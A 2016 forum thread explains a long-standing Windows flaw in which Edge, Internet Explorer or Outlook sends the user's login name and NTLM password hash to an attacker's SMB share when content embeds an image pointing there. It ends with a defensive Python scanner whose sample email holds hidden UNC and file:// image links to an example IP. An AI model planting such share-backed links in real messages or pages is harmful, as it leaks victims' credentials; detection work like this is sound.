Petrovic Posted August 3, 2016

Log-in data exploit first reported in 1997 is still around

MICROSOFT'S WINDOWS 10 Anniversary Update still contains an age-old coding glitch that's responsible for leaking log-in and password data to potentially undesirable people. The exploit dates back to 1997 and involves Windows trying to log in to any Server Message Block (SMB) share by offering user credentials. Thus, all an attacker has to do is set up an SMB network share and encourage the victim to visit the IP address set up to host it. This leaks the Windows log-in name and NT LAN Manager hash of the password and Windows domain.

It was never seen as a particularly huge problem when this information was just local system log-in details, but Windows 8's love of attaching the log-in to online accounts on Microsoft Exchange, Hotmail or Office 365 upped the risk considerably. Simply put, anything attached to that central log-in is now open to compromise, whether it's data stored on OneDrive, a Skype account, Office, Xbox Live or even, we'd theorise, Cortana, seeing as Microsoft insists that you sign into the assistant separately since the release of the Anniversary Update.

The Edge browser end user base is growing, so it's also now particularly easy for external forces to engineer navigation to the network share. Even something as simple as an embedded image in another website can act as an easy incentive. VPN connections using Windows VPN software can also be targeted in the same way. If the network share is exploited through a VPN, the VPN's log-in credentials will be revealed instead.

VPN provider Perfect Privacy offers a test website which works only in Internet Explorer or Edge to determine how many of your details are leaking. Obviously, you use this at your own risk. Chrome, Firefox and any other popular non-Windows browsers aren't ordinarily affected by this glitch. But seeing as everything else in Windows can be targeted, these browsers can easily redirect to Outlook or any number of other Windows applications.

Article source
WALLONN7 Posted August 4, 2016

My five cents...

Discovered in 1997 by Aaron Spangler and never fixed, the WinNT/Win95 Automatic Authentication Vulnerability (IE Bug #4) is certainly an excellent vintage. In Windows 8 and 10, the same bug has now been found to potentially leak the user's Microsoft Live account login and (hashed) password information, which is also used to access OneDrive, Outlook, Office, Mobile, Bing, Xbox Live, MSN and Skype (if used with a Microsoft account). The bug itself seems to be present in all Windows systems since Windows 95 / NT, although only Windows 8 and above are effectively compromised. To see if your machine is affected, you may want to check the public demonstration of the exploit, set up by the guys from [Perfect Privacy] and based on [ValdikSS]'s original work.

The exploit as demonstrated by Xiaoran Wang et al. in the white paper.

Basically, the default User Authentication Settings of Edge/Spartan (also Internet Explorer, Outlook) let the browser connect to local network shares, but erroneously fail to block connections to remote shares. To exploit this, an attacker would simply set up a network share. An embedded image link that points to that network share is then sent to the victim, for example as part of an email or website. As soon as the prepped content is viewed inside a Microsoft product such as Edge/Spartan, Internet Explorer or Outlook, that software will try to connect to that share in order to download the image. Doing so, it will silently send the user's Windows login username in plaintext along with the NTLMv2 hash of the login password to the attacker's network share.

Even though the original issue exists and has been known for more than two decades now, its severity has crept in only lately. Back in 1997, the attacker would have only obtained your local Windows login data, but in Windows 10, the default login method is the user's Microsoft Live account. An attacker may have to resort to GPU-assisted hash-cracking to retrieve the password from the NTLMv2 hash (or even not), but the result can be as thorough as full compromise, including the mentioned Microsoft services and even remote access.

To mitigate, use a firewall, strengthen your Microsoft Live account password and avoid using Microsoft products such as Edge/Spartan, Internet Explorer (just saying..) and Outlook, as well as VPN connections over IPSec, which may leak VPN credentials in the same way. Firefox and Chrome are not affected.

Source
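Both posts above describe the same trigger: an embedded resource whose address is a network share, which Windows will fetch over SMB and authenticate to automatically. The following is an added example, not code from either post or from Perfect Privacy, showing how a mail gateway or web-content filter could flag such resources before they are rendered. The HTML sample and the 203.0.113.10 address are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# \\host\share\... : a UNC path, which Windows resolves over SMB.
UNC_RE = re.compile(r"^\\\\[^\\]+\\")


def classify_target(value):
    """Return a reason string if fetching this address would involve SMB, else None."""
    v = value.strip()
    if UNC_RE.match(v):
        return "UNC path"
    parsed = urlparse(v)
    scheme = parsed.scheme.lower()
    if scheme == "smb":
        return "smb: URL"
    # file://host/share and file:////host/share both name a remote host.
    if scheme == "file" and (parsed.netloc or parsed.path.startswith("//")):
        return "file: URL with remote host"
    return None


class ResourceScanner(HTMLParser):
    """Collect auto-fetched resources (img/script src, link href, ...) that point at shares."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, attribute, value, reason)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None:
                continue
            # src is fetched on any tag; href is fetched automatically only on <link>.
            if name == "src" or (tag == "link" and name == "href"):
                reason = classify_target(value)
                if reason:
                    self.findings.append((tag, name, value, reason))


def scan_html(html):
    scanner = ResourceScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample message: one benign image, two share-backed images, one share-backed stylesheet.
SAMPLE_EMAIL_HTML = r"""<html><body><p>Quarterly report attached.</p>
<img src="https://cdn.example.test/logo.png">
<img src="\\203.0.113.10\share\pixel.png" width="1" height="1">
<img src="file://203.0.113.10/share/pixel.png">
<link rel="stylesheet" href="file:////203.0.113.10/share/style.css">
<a href="\\fileserver.example\docs">manual click, not auto-fetched</a>
</body></html>"""

if __name__ == "__main__":
    for tag, attr, value, reason in scan_html(SAMPLE_EMAIL_HTML):
        print(f"flag: <{tag} {attr}={value!r}> ({reason})")
```

The `<a>` element is deliberately left unflagged because a link is only followed on a click, whereas `src` and stylesheet `href` attributes are fetched the moment the content is rendered, which is the behaviour the thread describes.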